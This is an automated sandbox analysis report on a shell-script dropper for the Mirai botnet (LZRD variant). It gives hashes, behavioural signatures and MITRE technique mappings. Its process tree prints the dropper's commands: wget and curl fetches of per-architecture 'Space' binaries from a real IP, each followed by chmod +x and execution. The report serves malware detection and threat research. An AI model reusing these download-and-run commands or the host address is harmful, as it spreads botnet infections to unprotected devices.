Analysis
-
max time kernel
12s -
max time network
84s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
arch:armhfimage:debian9-armhf-20240418-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
27-12-2024 07:52
Static task
static1
Behavioral task
behavioral1
Sample
1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
1.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
1.sh
-
Size
2KB
-
MD5
e182ba2d64359a90a25281b53cdd0b14
-
SHA1
d8450d776b48b8834a1c607402eebf97bc0a126b
-
SHA256
86ae998ba71a86e08b70da8e5acf1ee1ed9f827abc1b733d7e39bc7201d96af3
-
SHA512
71e3f17025d636f8ccbd469bfc6ddeb7ea14bd71a952ad83058c3fb04141039688f6e178d7f3944627aedd1e7ea2c4924d7b452d9e4db192827bf3339624321d
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 765 chmod 678 chmod 684 chmod 697 chmod 713 chmod 729 chmod 748 chmod 759 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/Space 679 Space /tmp/Space 685 Space /tmp/Space 698 Space /tmp/Space 714 Space /tmp/Space 731 Space /tmp/Space 749 Space /tmp/Space 760 Space /tmp/Space 766 Space -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 2 IoCs
description ioc Process File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space -
resource yara_rule behavioral2/files/fstream-5.dat upx behavioral2/files/fstream-6.dat upx behavioral2/files/fstream-7.dat upx behavioral2/files/fstream-8.dat upx behavioral2/files/fstream-9.dat upx -
Checks CPU configuration 1 TTPs 8 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/2/status Space File opened for reading /proc/4/status Space File opened for reading /proc/18/status Space File opened for reading /proc/115/status Space File opened for reading /proc/207/status Space File opened for reading /proc/227/status Space File opened for reading /proc/323/status Space File opened for reading /proc/599/status Space File opened for reading /proc/643/status Space File opened for reading /proc/648/status Space File opened for reading /proc/769/status Space File opened for reading /proc/6/status Space File opened for reading /proc/10/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/11/status Space File opened for reading /proc/42/status Space File opened for reading /proc/81/status Space File opened for reading /proc/112/status Space File opened for reading /proc/642/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/672/status Space File opened for reading /proc/737/status Space File opened for reading /proc/self/exe Space File opened for reading /proc/23/status Space File opened for reading /proc/316/status Space File opened for reading /proc/597/status Space File opened for reading /proc/637/status Space File opened for reading /proc/645/status Space File opened for reading /proc/41/status Space File opened for reading /proc/687/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/7/status Space File opened for reading /proc/8/status Space File opened for reading /proc/15/status Space File opened for reading /proc/16/status Space File opened for reading /proc/24/status Space File opened for reading /proc/310/status Space File opened for reading /proc/595/status Space File opened for reading /proc/self/auxv curl File opened for reading /proc/19/status Space File opened for reading /proc/27/status Space File opened for reading /proc/579/status Space File opened for reading /proc/12/status Space File opened for reading /proc/17/status Space File opened for reading /proc/26/status Space File opened for reading /proc/103/status Space File opened for reading /proc/149/status Space File opened for reading /proc/filesystems cp File opened for reading /proc/20/status Space File opened for reading /proc/43/status Space File opened for reading /proc/114/status Space File opened for reading /proc/159/status Space File opened for reading /proc/290/status Space File opened for reading /proc/313/status Space File opened for reading /proc/766/status Space File opened for reading /proc/14/status Space File opened for reading /proc/145/status Space File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/22/status Space -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 717 wget 722 curl 728 cat 734 wget 739 curl 746 cat -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space 1.sh File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.mips wget
Processes
-
/tmp/1.sh/tmp/1.sh1⤵
- Writes file to tmp directory
PID:645 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:647
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:654
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:666
-
-
/bin/catcat Space.arc2⤵PID:676
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:679
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:681
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:682
-
-
/bin/catcat Space.x862⤵PID:683
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:684
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:685
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:688
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:690
-
-
/bin/catcat Space.x86_642⤵PID:695
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:697
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:698
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:700
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:705
-
-
/bin/catcat Space.i6862⤵PID:711
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:713
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:714
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:717
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.mips2⤵
- Checks CPU configuration
- System Network Configuration Discovery
- Writes file to tmp directory
PID:722
-
-
/bin/catcat Space.mips2⤵
- System Network Configuration Discovery
PID:728
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:731
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:734
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.mips642⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:739
-
-
/bin/catcat Space.mips642⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:749
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:751
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.mpsl2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:755
-
-
/bin/catcat Space.mpsl2⤵PID:758
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:760
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:762
-
-
/usr/bin/curlcurl -O http://159.100.18.129/hiddenbin/Space.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/catcat Space.arm2⤵PID:764
-
-
/bin/chmodchmod +x 1.sh busybox Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-a0f1de3367d948f7bc54529065aa8600-systemd-timedated.service-ZNObmM2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:766
-
-
/usr/bin/wgetwget http://159.100.18.129/hiddenbin/Space.arm52⤵PID:802
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD586b0dbac78477aca5c3dd080ba53e837
SHA12542925378bca24e31bfcbfb9197cb0ba874fb21
SHA25643a4a0183be4f67dc7757fd2068e7c3a604423abe3b5e71ad03b9f382a70899f
SHA5126189287779a998d158de62b5b434338f7cfb556b92dc11280f0bbb6bedc267864c6b48085c80109169204f1d27b12abb5a268fa58da57b2d6200eb4d6eb25758
-
Filesize
36KB
MD5d247ab84c9c090053b129afa0e59bfff
SHA10710e52bdb6ee2c8c4d0d1f88b402f1584d7d3cc
SHA2560d6e8522651a07c5b58e1abafb454b35ee08238a9a7512e50e37e72c1b17dfbd
SHA512994e66ff08246807783f8ca10df97ebef03fa05aa1ef3eac7f08f285b1057d5e2bb6c5159f6731380a3014e7d2e4a2596e0a9f6cbd1a1f147ae23123adc77520
-
Filesize
37KB
MD52e192eaf9a8107d21822c3ca2ae74c8d
SHA1706b0e0202ab2e9e30623be13f29ff219bf1a623
SHA2564b7b6dfeedc4816a5a879af9e4b2cc9b9fc16a423190af9aa733eb5f4b6b50a3
SHA512a956f3968b06ddc76ce2c1a688aeafaa6132ac38cd363e70e3adbece850baf71c519470769fd9ed6cf67dfd758ad2f38c07ec81860e32b36c0b1037ab7d77072
-
Filesize
43KB
MD5bfaa04ccd012b09be805bd489a4775bb
SHA1de53bbdf475cdb83582b2018196ad1d4b8719547
SHA256421d80f8efd39afb7cfa2bc967026786261fd4267497db25bf33e37d5ee88e47
SHA512a6da645dba966dd2aed51876d49462c3af0a8847941da447110cb145e5fea372d184705ade19ac56d5d6741a5923bfeb3f94b9c2c539f0588d92f91c12c05fb6
-
Filesize
43KB
MD537814cf80cb0e8085194e1cf889f1a6f
SHA1a1a6fe66714d4547ad3a6eee120098100b86e585
SHA256ea1726caced0d7ef3b50e8a1dce83b0949e17aad92b00b8d9b1d88136850a957
SHA512ec69e6606a78f2910635a44d482fc7bb29566ee2ab739722c1e1612aa0854114acc48e2a26d845bf63acfa4db7fe8f278c5ec95731f83e66ef936c194566c15b
-
Filesize
113KB
MD5cafba952355d27a129910f5e4f3f99ce
SHA161baaf26de5da12a2941ec73ae7bd8fd8f37f704
SHA2562fcfb888bc32cadee51779121fe4de505b22668a6a05ad3d50780fa2b3774d37
SHA51286b847fe57dd5c4dab277b5f966c1b46899c86c0e4c6a2a1b50838d3b2d47ad79c9944c96c85b2b4f1e68bcba02fd4890aa3452a7cc80778876ede679b3ea730
-
Filesize
507KB
MD5e588bcf03ae78237b58899d35f50c570
SHA12194732ebbefbc27bdae876c77f2a97a20175710
SHA2562dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88
SHA512904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555